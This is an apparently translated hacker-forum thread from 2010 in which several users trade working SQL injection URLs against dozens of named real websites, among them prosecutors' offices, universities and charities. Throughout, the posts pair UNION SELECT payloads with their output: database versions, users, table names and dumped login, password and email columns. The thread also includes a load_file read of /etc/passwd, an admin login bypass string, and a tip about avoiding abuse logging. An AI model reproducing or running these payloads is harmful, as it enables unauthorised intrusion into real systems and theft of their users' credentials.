View full version: SQL Injections
http://www.datacenter-academy.com/site/index.php?id=2+union+select+1,2,3,4,5,6,version()
version - 5.0.45
nemaniak
30.04.2010, 00:21
baltisk.ru - Official site of the Baltiysk Municipal District
http://www.baltisk.ru/index2.php?option=com_joomradio&page=show_video&id=-1+union+all+select+1,concat_ws%280x3a,version%28%2 9,user%28%29,database%28%29%29,3,4,5,6,7+--+
5.0.67-log:u148676@10.10.153.172:u148676
ech-chaab.com PR-7
http://www.ech-chaab.com/ar/index2.php?option=com_joomradio&page=show_video&id=-1+union+all+select+1,concat_ws%280x3a,version%28%2 9,user%28%29,database%28%29%29,3,4,5,6,7+--+
log:journaledit0@imu116.infomaniak.ch:ech-chaabcom
tzaba.gr PR-4
http://www.tzaba.gr/index2.php?option=com_joomradio&page=show_video&id=-1+union+all+select+1,concat_ws%280x3a,version%28%2 9,user%28%29,database%28%29%29,3,4,5,6,7+from+jos_ users+--+
5.0.67.d7-ourdelta-log:tzaba@97.74.24.6:tzaba
laplata.abuelas.org.ar PR-4
http://www.laplata.abuelas.org.ar/index2.php?option=com_joomradio&page=show_video&id=-17+union+all+select+1,concat_ws%280x3a,version%28% 29,user%28%29,database%28%29%29,3,4,5,6,7+--+
5.0.24a-log:uv5642@localhost:uv5642_laplata
bces-india.com PR-4
http://www.bces-india.com/index2.php?option=com_joomradio&page=show_video&id=-1+union+all+select+1,concat_ws%280x3a,version%28%2 9,user%28%29,database%28%29%29,3,4,5,6,7+--+
5.1.45-log:bcesindi_bcesind@localhost:bcesindi_portal1
http://sovazs.com/showcontest.phtml?id=-15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ ws(0x3a%20,user(),database(),version()),14,15--
User: u_sovazs@localhost
Version: 5.0.51a-24+lenny3-log
Database: sovazs
-=ASSKAKO=-
30.04.2010, 11:19
http://www.solvex.ru/countries/israel/news/?id=48+and+1=2+union+select+version(),2,3--
Database Version: 5.1.39
Database name: solvexmdb
User name: root@localhost
http://www.gommed.ru/shop/items.php?id=590'+union+select+1,2,concat_ws(0x3a% 20,user(),database(),version()),4,5,6,7,8,9,10,11, 12/*
User: gommed_db@localhost
Version: 5.0.45
Database: gommed_db
-=ASSKAKO=-
30.04.2010, 19:16
Injection at login ("Синхролайн")
http://sl.ru/admin/
Login: admin' OR 'admin'='admin/*
Password: test
http://www.tptherapy.com/about.php?id=-19'+union+select+1,2,3,concat_ws(0x3a%20,user(),da tabase(),version()),5,6,7,8,9+from+admin/*
User: tpball_dbadmin@localhost
Version: 4.1.22-standard
Database: tpball_default
http://netrock101.com/web/modules/ecal/display.php
post
katid=-1 union select concat_ws(0x3a,uname,pass,level,user(),version()), 2 from runcms_users
netrock_netrock@localhost
5.0.90-community-log
------------------
PS: don't try it with GET, it writes an abuse report to the log
LanSilot
30.04.2010, 22:13
www.labtam.ru
http://www.labtam.ru/index.php?act=news&id=-9+union+select+1,2,version(),4,5,6,7,8,9,10--
www.linguaservice.ru
http://www.linguaservice.ru/?act=news&id=-27+union+select+1,version(),3,4,5--
www.formumandme.com
http://www.formumandme.com/article.php?a=-396+union+select+1,version(),3,4,5,6,7,8,9--
www.human-consult.net
http://www.human-consult.net/forum/error.php?errorid=-8+union+select+1,version()--
www.genderwork.ca
http://www.genderwork.ca/cms/displaysection.php?sid=-18+union+select+1,2,version()--
http://www.kitcom.ru/goods/index.php?gm=-5+union+select+1,2,aes_decrypt(aes_encrypt(concat_ ws(0x3a,@@version,user(),database(),@@version_comp ile_os),0x71),0x71)+--
version : 4.1.21
user : kitcom@localhost
database : fpublisher
os : alt-linux-gnu
http://www.kitcom.ru/goods/index.php?gm=-5+union+select+1,2,aes_decrypt(aes_encrypt(group_c oncat(login,0x3a,pwd,0x3a,email+SEPARATOR+0x0b),0x 71),0x71)+from+users+limit+0,1+--
/admin/
/sqladmin/
/tmp/
maybe someone will manage it....
http://www.artlies.org/article.php?id=-1869+union+select+1,2,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os),4,5,6,7,8,9,1 0--+&issue=65&s=0
version:4.1.25-Debian_mt1
user:artlies@64.13.232.11
pr:5
http://www.joinava.org/APS4P20081101A/ava.php?id=-34+union+select+concat_ws(0x3a%20,user(),database( ),version())+from+cms_users
User: joinava2_joinava@localhost
Version: 5.0.90-community
Database: joinava2_APS3Production
LanSilot
01.05.2010, 22:56
ecadigitallibrary.com
http://ecadigitallibrary.com/conference.php?cid=-8+union+select+1,2,version(),4,5,6,7,8,9,10--
http://www.concertonet.com/scripts/cd.php?ID_cd=-1892+union+select+1,2,3,4,5,6,7,8,9,10,11
user(): sc_concertonet@localhost
version(): 5.0.45
database(): sc_concertonet
OS: Red Hat
http://www.landroverspb.ru/see.php?view=4&id=-731+union+select+1,2,3,4,5,6,concat_ws(0x3a%20,use r(),database(),version()),8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23--
User: landrospru@localhost
Version: 4.1.22-lk-log
Database: landrospru
http://fabrica-ptic.ru/rss.php?id=-1+union+all+select+1,2,3,aes_decrypt(aes_encrypt(c oncat_ws(0x3a,@@version,user(),database(),@@versio n_compile_os),0x71),0x71),5,6,7,8,9,10+--
version : 5.1.39
user : prodorog_ptich@localhost
database : prodorog_ptichiidvor
os : unknown-linux-gnu
http://fabrica-ptic.ru/rss.php?id=-1+union+all+select+1,2,3,concat_ws(0x3a,login,pwd, email),5,6,7,8,9,10+from+mysite_authsiteusers--
-=ASSKAKO=-
02.05.2010, 14:11
http://www.megapolis.kz/show_article.php?art_id=14550+and+1=0+union+select +user(),version(),3,4,5,6,7,8,9,10,11,12,database( )--
user(): megapoli_user@localhost
version(): 5.0.90-community-log
database(): megapoli_db
http://www.cemsys.com/pressreleases.php?id=78+union+select+1,2,3,4,5,6,7
Version: 5.0.68-percona-3-log
Database: cemsyscom_95063_db1
User: ucemsysc_95063_1@linweb7.atlas.pipex.net
http://www.idn.cz/portfolio_genre.php?lang=en&id=-78+union+select+1,2,concat(version(),0x3a,user(),0 x3a,database())
Version: 4.0.27
Database: LH257300@LOCALHOST
User: LH257300DB
http://www.ih-ra.com/newsroom/full_articles.php?article_ID=-49+union+select+1,concat(userID,char(58),pass,char (32,58,32),email),3,4,5,6,7,8,9,10+from+members+li mit+0,1--
-=ASSKAKO=-
02.05.2010, 18:57
http://lifexchange.ru/articles/view/id/116+and+1=2+union+select+1,2,3,4,5,6,concat_ws(0x3 a,user(),version(),database()),8,9,10,11,12,13,14--.html
user(): u200939@10.10.153.211
version(): 5.0.67-log
database(): u200939
http://www.pap.org.sg/articleview.php?id=1514&mode=&cid=-23+union+select+1,2,concat_ws(0x3a%20,user(),datab ase(),version()),4,5,6,7,8,9/*
User: pap_db@localhost
Version: 5.0.22
Database: pap
Google PR: 6
http://www.ritex-t.ru/index.php?id=2&row=-13+union+all+select+1,2,3,4,5,aes_decrypt(aes_encr ypt(concat_ws(0x3a,@@version,user(),database(),@@v ersion_compile_os),0x71),0x71),7,8+--
version : 5.0.67-log
user : u57230@10.10.10.208
database : u57230
os : unknown-freebsd6.3
heretic1990
02.05.2010, 22:23
http://www.gimn4.com/user.php?id=-3+union+select+1,concat(LOGIN,0x3a,PASSWORD,0x3a,R EG_MAIL),3,4,5,6,7,8,9,10,11,12,13,14,15+from+syst em_users
g4_user004@localhost:g4_new:5.0.51a-24+lenny2+spu1
http://www.crossmaster.ru/free-crossword-puzzles-stats-user.php?id=-3+union+select+1,2,3,concat_ws(0x3a,user(%20),data base(),version()),5%20--
http://www.krasrepetitor.ru/card-user.php?id=-13+union+select+1,2,concat(user_name,0x3a,user_pas sword),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+kr _user+limit+1,1
krtmps@localhost:krtmps:5.0.67-percona-b5-log
http://www.cutezone.ru/pages/user.php?id=-50+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,concat(Lo gin,0x3a,Password,0x3a,Email),30,31,32+from+std_us ers
cutezone1@localhost:db_cutezone1:5.0.67-community
http://www.home-sweethome.nl/en/index.php?pid=-3+union+select+1,2,3,4,concat(user(),version(),dat abase(),@@version_compile_os)--
KOSTROMA REGION PROSECUTOR'S OFFICE
http://www.kosoblproc.ru/default.php?page=news&id=-3044+union+select+1,2,3,aes_decrypt(aes_encrypt(co ncat_ws(0x3a,version(),user(),database(),@@version _compile_os),0x71),0x71),5+--
version : 4.1.9-standard-log
user : kosoblprocru@localhost
database : kosoblprocru
os : unknown-freebsd4.7
http://animeradio.ru/ownblog.php?uid=1'
I can't find the tables, can anyone help?
http://animeradio.ru/ownblog.php?uid=-1+union+all+select+1,2,3,concat_ws%280x3a,login,pw d,%20email%29,5,6,7,8,9,10+from+anime--
heretic1990
03.05.2010, 08:30
http://www.volgotrans.mv.ru/front/profile.php?id=-573+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35%20--
kater@localhost:volgotrans:5.0.51a-24+lenny2+spu1-log
http://www.ccs-tlt.ru/price/firm_profile.php?id=-6+union+select+1,2,3,4,5,6,7,8,9,10%20--
ccstlt@localhost:ccstlt:4.0.24mysql Ver 34.52 Distrib 4.01.44, f-log
http://www.kfmesi.ru/profile.php?id=-16+union+select+1,2,3,concat(username,0x3a,user_pa ssword),5,6,7,8,9,10,11,12,13,14,15,16+from+phpbb_ users
naher@localhost:poher:5.0.51a
http://allaudi.ru/profile.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27%20--
allaudi_user001@localhost:allaudi_mainbase:5.0.51a-24+lenny2+spu1
http://map.barierovnet.org/profile.php?id=-7+union+select+1,2,3%20--
u175600@10.8.0.71:u175600_2:5.0.90-log
http://www.psbspeakers.ru/ru/news/index.php?id63=48+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15%20--
root@:bonanza:5.0.45
http://www.emiclassics.com/artistbiography.php?aid=-21+union+select+1,2,3,concat(username,char(58),pas sword),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26+from+users+limit+0,1
PR-7
p@pillon
03.05.2010, 18:31
http://runaki.net/print.php?section=wtar&id=-1/**/union/**/all/**/select/**/1,load_file('/etc/passwd'),3,4,5,6,7--
http://runaki.net/details.php?section=wtar&id=-1/**/union/**/all/**/select/**/1,user,3,pass,5,6,7+from+user--
http://coh.redtomax.com/contacts/contact.php?id=99999999+union+select+1,concat_ws(0 x3a%20,user(),database(),version()),3,4,5,6,7,8,9, 10,11,12/*
User: nofuture@localhost
Version: 5.0.32-Debian_7etch11-log
Database: nofuture
orgs
http://www.hmsu.org/showgig.php?gigid=-178+union+select+1,2,3,4,concat(username,char(58), password),6,7,8,9+from+HMSUAuth--
user(): root@localhost
version(): 5.1.22-rc-log
database(): hmsu
OS: portbld-freebsd7.0
--------------------------------------------------------------------
http://www.globalcanopy.org/main.php?m=117&sm=-176+union+select+1,2,3,4,5,6
user(): globalcanopy@localhost
version(): 5.0.27
database(): globalcanopy
OS: Red Hat
--------------------------------------------------------------------
http://www.mielomabrasil.org/news2.php?id_not=-42+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16--
user(): myeloma@187.45.193.218
version(): 4.1.22-locaweb-log
database(): myeloma
OS: pc-linux-gnu
--------------------------------------------------------------------
http://www.archivalencia.org/contenido.php?a=5&modulo=71&pad=5&cat=-14+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
user(): usrarchi3871@localhost
version(): 5.0.45-community-nt
database(): db_archidiocesis
OS: Windows
--------------------------------------------------------------------
http://www.cartadelapaz.org/portal_cp/ahumor_detall.php?id=-294+union+select+1,2,(user_name,char(58),user_pass word),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+ agora.phpbb_users--
user(): cartapaz@web.pangea.lan
version(): 5.0.51a-24+lenny
database(): cartapaz
OS: Debian
--------------------------------------------------------------------
http://www.chantez-online.org/chant.php?ID=-833+union+select+1,2--
user(): chantezonline@10.0.45.57
version(): 5.0.90-log
database(): chantezonline
OS: pc-linux-gnu
Skofield
03.05.2010, 23:51
http://www.wanlebanon2010.com - PR 6
http://www.wanlebanon2010.com/articles.php?id=-2+union+select+1,version(),3,4,5,6,7--
Database Version: 5.0.51a-24+lenny3-log
Database name: lebanon2010
User name: lebanon@localhost
-----------------------------------------------------------------------------------------------------------
http://www.psy.ohio-state.edu - PR 6
http://www.psy.ohio-state.edu/php/FullEvent.php?id=63+union+select+1,2,3,4,5,6,versi on(),8,9--
Database Version: 5.0.77
Database name: department
User name: soyung@localhost
-----------------------------------------------------------------------------------------------------------
http://www.genomics.cn - PR 6
http://www.genomics.cn/en/edu.php?id=-201+union+select+version(),2,3,4,5--
Database Version: 5.0.77-log
Database name: newbgi
User name: www@192.168.8.5
http://202.120.108.10/depart/index.php?mod=Default&act=Xy&id=-7+union+select+1,2,concat(user(),version,database( ),@@version_compile_os),4,5,6
.:[melkiy]:.
04.05.2010, 14:20
http://tatural.ru/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,password),3,4,5,6 ,7+from+jos_users+--+
http://kookdookoo.com/punjabi/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,password),3,4,5,6 ,7+from+jos_users+--+
http://poltavo.com/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,password),3,4,5,6 ,7+from+jos_users+--+
http://www.baltisk.ru/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,password),3,4,5,6 ,7+from+jos_users+--+
http://www.home.zemliaky.org/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,password),3,4,5,6 ,7+from+jos_users+--+
http://ofaqim.info/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,id,user name,password))),3,4,5,6,7+from+jos_users+--+
http://i-de.org.ru/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,passwor d))),3,4,5,6,7+from+jos_users+--+
http://snt-tvoydom.ru/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,passwor d))),3,4,5,6,7+from+jos_users+--+
http://www.ruworld.org/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,passwor d))),3,4,5,6,7+from+jos_users+--+
http://www.newradio.ru/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,passwor d))),3,4,5,6,7+from+jos_users+--+
http://mozhga18.ru/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,passwor d))),3,4,5,6,7+from+jos_users+--+
http://www.g-news.com.ua/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,unhex(hex(concat_ws(0x3a,passwor d))),3,4,5,6,7+from+jos_users+--+
http://www.iaaf12.com/wap/wapmain.php?option=onews&action=link&id=-1+union+select+1,username,3,password,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28+from+cms_users
http://vig.bstu.by/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat_ws(0x3a,username,password),4,5,6,7,8+fr om+jos_users+-0-+
http://www.dpack.ru/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat_ws(0x3a,username,password),4,5,6,7,8+fr om+jos_users+--+
http://crd-institute.com/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,password,username,5,6,7,8+from+crd_users+--+
http://sams.perm.ru/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8+from+ jos_users+--+&Itemid=92
http://www.foxcom.ru/jml/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password),5,6,7+from+jo s_users--
http://miacom.kz/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password),5,6,7+from+jo s_users--
http://www.misiabela.pl/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,username,password ),3,4,5,6,7+from+jos_users+--+&Itemid=92
http://www.wegp.net/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,concat_ws(0x3a,username,password ),3,4,5,6,7+from+jos_users+--+&Itemid=92
http://www.mentalwear.fi/web/index.php?id=41&shop_show_product=1&tuote_id=-73+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17--
user(): mentalwearfi@10.1.0.15
version(): 5.0.45-log
database(): mentalwearfired
os: Red Hat
p@pillon
04.05.2010, 15:36
Pr 4
http://www.plusbellelavie.org/news2.php?id=-1/**/union/**/all/**/select/**/1,user(),3,database(),5,6,7,8,9,10,11
http://www2.candw.lc/Media/news2.php?ID=-1/**/union/**/all/**/select/**/1,user(),version(),4,5,6,7,8--
user(): cwslu@localhost
version(): 4.0.18-nt
http://62.149.36.239/~pamco/news2.php?id=-1/**/union/**/all/**/select/**/1,2,user(),4,version(),6,7--
user(): pamco_pamco2@localhos
version(): 4.1.22-standard
aka_zver
04.05.2010, 18:56
Site: http://www.sasymphony.org
TIC: 10
PR: 5
Example query: http://www.sasymphony.org/index3.php?eventIdD=-25+union+select+1,now(),3,4,5,concat_ws(0x0b,datab ase(),user(),version(),@@version_compile_os),7,8,9 ,group_concat(0x0b,table_name),11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37+from+information_schema.tables--+
version - 5.0.90-community
user - sasympho@localhost
database - sasympho_symphonysite
os - pc-linux-gnu
===================================
Site: http://www.franziskaner-minoriten.de
TIC: 0
PR: 4
Example query: http://www.franziskaner-minoriten.de/index3.php?id=130+or+(select+count(*)+from+(select +1+union+select+2+union+select+3)x+group+by+concat (mid(version(),+1,+63),+floor(rand(0)*2)))--+
user - db_minoriten@localhost
version - 5.0.45
database - db_minoriten
os - redhat-linux-gnu
===================================
Site: http://www.enpi-info.eu
TIC: 20
PR: 7
Example query: http://www.enpi-info.eu/main.php?id=344&id_type=2+or+(select+count(*)+from+(select+1+union +select+2+union+select+3)x+group+by+concat(mid(use r(),+1,+63),+floor(rand(0)*2)))--+
user - enpid@localhost
version - 5.0.45
database - enpidef
os - redhat-linux-gnu
http://www.bosnia.ba/razglednice/index.php?dk=-13+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,use r(),version(),database(),@@version_compile_os),10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39+--
http://www.music-key.ru/shop.php?uid=-3071+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,0--
http://www.persons-journal.com/index.php?context=submenu2&id=271%20union%20select %20group_concat%28table_name%29%20from%20informati on_schema.tables%20limit%201,1/*&pid=265&s=188
KENT1994
04.05.2010, 22:31
casgroup.fiu.edu/lacc/pages.php?id=719UNION ALL SELECT 1,%String_Col%,3,4,5,6,7--
Host IP: 131.94.74.225
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.1.6
DB Server: MySQL >=4.1
Current DB: cas
www.rhinossoccer.com/pages.php?id=23UNION ALL SELECT 1,2,3,%String_Col%,5,6,7,8,9,10,11--
Host IP: 69.163.245.54
Web Server: Apache
Powered-by: PHP/5.2.12
DB Server: MySQL unknown ver
Current DB: rhinossoccer
Yandex TIC 10
Google PageRank 5
Peculiar output..
http://www.globalresearch.ca/index.p...t=va&aid=18768+union+select+1,2,3,version(),5,6,7,8,9,0 ,1,2,3,ve rsion(),5,6,7,8,9,0,1,2,3,version(),5,6,7,8,9,0,1, 2,3,version(),5,6,7,8,9,0,1,2,3,version(),5,6,7,8, 9,0,1,2+limit+1,1--
http://artmaterial.ru/about.php?content=dealer&id=-1%20union%20select%201,2,3,user_login,user_passwor d,6,7,8,9,0,1,2%20from%20users+limit+1,1
http://www.spinter.net/page.php?id=-2+union+select+1,concat(user(),char(58),version(), char(58),database())
KENT1994
04.05.2010, 22:48
www.williambloom.com/pages.php?id=44UNION ALL SELECT 1,2,%String_Col%,4,5 and 'x'='x
Host IP: 83.223.101.10
Web Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8b mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8
Powered-by: PHP/5.2.8
DB Server: MySQL >=5
Current DB: williamb_db
www.costasales.com/pages.php?id=168UNION ALL SELECT %String_Col%,2 and 'x'='x
Host IP: 87.106.251.143
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Current DB: costasales_csales
www.snakedancecondos.com/pages.php?id=18 18' AND %True_Expression% AND 'x'='x
Host IP: 209.188.112.4
Web Server: Apache/2.2.3 (Red Hat)
Powered-by: PHP/5.2.11
DB Server: MySQL >=5
Current DB: snakedancecondos
www.thereddstone.com/pages.php?id=3UNION ALL SELECT 1,%String_Col%,3,4--
Host IP: 64.150.165.92
Web Server: Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
Powered-by: PHP/5.2.0-8+etch15
DB Server: MySQL >=5
Current DB: phpmy1_thereddstone_com
www.connexions-berkshire.org.uk/pages.php?id=230 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,%String_Col%,12,13,14--
Host IP: 217.77.176.23
Web Server: Zeus/4.2
Powered-by: PHP/4.4.2
DB Server: MySQL
Current DB: connexions-berkshire
www.brightworks.net/pages.php?id=leed AND %True_Expression% AND 'x'='x
Host IP: 98.129.111.2
Web Server: Apache/2.2.3 (Red Hat)
Powered-by: PHP/5.2.13
DB Server: MySQL >=5
Current DB: brightworks_site
hackEr :) :rolleyes: :cool:
+++
http://www.novosarajevo.ba/stream/article.php?pid=-301+union+select+1,2,3,aes_decrypt(aes_encrypt(con cat(user(),char(32,58,32),version(),char(32,58,32) ,database()),1),1),5,6,7,8,9,10,11,12,13,14,15,16, 17,18--
KENT1994
04.05.2010, 23:22
www.col3negoriginal.com/pages.php?id=14 UNION ALL SELECT 1,%String_Col%,3 and 'x'='x
Host IP: 85.25.124.18
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MySQL unknown ver
Current DB: lasantha_col3neg
www.huronperthrentals.ca/pages.php?id=2 UNION ALL SELECT 1,%String_Col%,3--
Host IP: 69.41.197.19
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Current DB: rentals
www.ccop.org/pages.php?id=38 AND %True_Expression% AND 'x'='x
Host IP: 216.92.217.5
Web Server: Apache/2.2.14
Powered-by: PHP/5.2.11
DB Server: MySQL >=5
Current DB: kinnon_ccop
www.fetalmonitors.biz/pages.php?ID=13 AND %True_Expression%
Host IP: 74.55.84.245
Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.2
Powered-by: PHP/4.4.8
DB Server: MySQL >=5
Current DB: tiyanak_cmsorig
www.turkishculture.org/pages.php?ParentID=14&ID=70 AND %True_Expression% AND 'x'='x
Host IP: 209.197.125.227
Web Server: Apache/2.2.15
Powered-by: PHP/5.2.13
DB Server: MySQL >=5
Current DB: turkish2_tcp
cmrc.ucc.ie/pages/K_staff_page.php?id=27 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12 and 'x'='x
Host IP: 143.239.1.112
Web Server: Apache/2.0.52 (Red Hat)
Powered-by: PHP/4.3.9
DB Server: MySQL >=4.1
Current DB: cmrc
www.sochi-international.ru/pages.php?id=2 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8,9,10,11 and 'x'='x
Host IP: 77.222.40.36
Web Server: Apache/1.3.37-lk.a (Unix) mod_defer/0.1.lk mod_python/2.7.11 Python/2.4.3 PHP/4.4.4 mod_dp/lk.0.4.4
Powered-by: PHP/4.4.4
DB Server: MySQL >=5
Current DB: sochiinr
http://www.starfiredirect.com/pages.php?id=5 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8--
Host IP: 66.147.249.135
Web Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2 mod_auth_passthrough/2.1 FrontPage/5.0.2.2635
Powered-by: PHP/5.2.11
DB Server: MySQL unknown ver
Current DB: starfir3_starfiredb
www.starting-gate.com/pages.php?id=26 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8 and 'x'='x
Host IP: 69.163.243.21
Web Server: Apache
Powered-by: PHP/5.2.13
DB Server: MySQL >=5
Current DB: 361641_startinggate
aka_zver
04.05.2010, 23:28
Site: http://www.portalcoquimbo.cl
TIC: 10
PR: 4
Example query: http://www.portalcoquimbo.cl/index3.php?id=-826+union+select+1,concat_ws(0x0b,version(),databa se(),user(),@@version_compile_os),now(),group_conc at(0x0b,table_name),5,6+from+information_schema.ta bles--+
version - 5.0.90-community-log
database - portalco_portal
user - portalco_portal@localhost
os - unknown-linux-gnu
http://lifestyle.bosnia.ba/index.php?sta=3&pid=-13817+union+select+1,concat_ws(0x3a,user(),version (),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
KENT1994
04.05.2010, 23:58
www.ankenyalumni.org/pages.php?id=54 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7--
Host IP: 199.108.163.173
Web Server: Apache/2.2.3 (Red Hat)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5 :p
Current DB: ankenyalumni
www.rhinos.com.au/pages.php?id=4 UNION ALL SELECT 1,%String_Col%,3,4--
Host IP: 203.80.162.200
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.6
DB Server: MySQL >=4.1
Current DB: rhinos
www.brightworks.net/pages.php?id=workshops AND %True_Expression% AND 'x'='x
Host IP: 98.129.111.26
Web Server: Apache/2.2.3 (Red Hat)
Powered-by: PHP/5.2.13
DB Server: MySQL >=5
Current DB: brightworks_site
:p :p
Financier
05.05.2010, 06:59
http://www.histonfc.co.uk/news.php?id=9999+union+select+1,2,3,4,5,6,7,8,vers ion(),10,11+from+news--
http://www.ng2.co.uk/news.php?id=1&newsid=9999+union+select+1,2,3,4,5,6,concat_ws(0x3 a,username,password,email)+from+users--
http://graysathletic.co.uk/news.php?id=9999+union+select+1,2,3,4,5,6,7,8,9,10 ,email+from+users/*
http://www.henleystandard.co.uk/news/news.php?id=99999+union+select+1,2,3,4,5,6,table_n ame,8,9,10,11+from+information_schema.tables+limit +17,1--
adfeature_text adfeature_upsell archive archivemedia breaking_news
comments displayads editorial editorschoice emails faceforradio hsotv
jobs jobs_new lineage media notices schools schoolsnews sitsvac
http://www.airdrie007seacadets.co.uk/news.php?id=999+union+select+1,concat_ws(0x3a,name ,pass,email),3,4,5,6,7,8,9+from+users--
http://lpoolcomp.co.uk/news.php?id=999+union+select+1,2,3,4,concat_ws(0x3 a,username,password,email),6,7,8,9,10+from+users+l imit+1,1--
http://www.wrightinvestments.co.uk/news.php?id=999+union+select+1,2,3,table_name,5,6+ from+information_schema.tables+limit+17,1--
IP_LOG gen_sets sessions stoContact tblCommercialNews tblCommercialPages
tblContacts tblDesign tblEngineeringPages tblFinancePages tblFinanceTestimonials tblGallery tblInvestNews tblInvestPages
tblLivingNews tblLivingPages tblLocationGallery tblMeta tblPDF tblPages blProperty tblSpec tblSpecGallery tblStoragePages tblStorageTestimonials tblSupplyPages tblTradePages tblTypes tblWri wlv_tblProperty wriContact
http://www.spygenius.co.uk/news.php?id=999+union+select+1,2,3,table_name,5,6, 7+from+information_schema.tables+limit+17,1--
advice alan_page audio_page gigs_page home_page links_page news_page photos_page press_page shop_page
http://www.prologisstafford.co.uk/news.php?id=18&newsid=999+union+select+1,2,3,4,5,6,concat_ws(0x3a ,username,password,email)+from+users--
http://www.michaellaird.co.uk/michael-laird-news.php?id=7+union+select+1,2,3,4,5,6,table_name, 8,9+from+information_schema.tables+limit+17,1--
awardcategories awards categories clients homebanner news pages people
photos portfolio press recruitment
http://www.beebeedevelopments.co.uk/news.php?id=9000019+union+select+1,2,3,4,5,6,table _name,8,9,10,11+from+information_schema.tables+lim it+17,1--
main pdf prop d spWebPartsSiteLog
http://www.lichfields.co.uk/news.php?id=99999+union+select+1,2,3,4,version(),6 ,7,8,9,10,11,12,13,14,15,16,17+from+clients--
http://www.physicaljerks.co.uk/news.php?id=99999+union+select+1,2,3,table_name,5, 6,7,8,9,10,11,12,13,14+from+information_schema.tab les+limit+28,1--
http://www.bkbluebird.co.uk/news.php?id=9999+union+select+1,2,3,version(),5,6--
heretic1990
05.05.2010, 13:17
http://www.oasis-gidro.ru/news.php?id=99+union+select+1,COLUMN_NAME,3,4+FROM +INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6f6 17a69735f7573657273+LIMIT+1,3%20--
u19255@10.10.223.208:u19255:5.0.67-log
AND HERE IS THE KURSK REGION PROSECUTOR'S OFFICE...
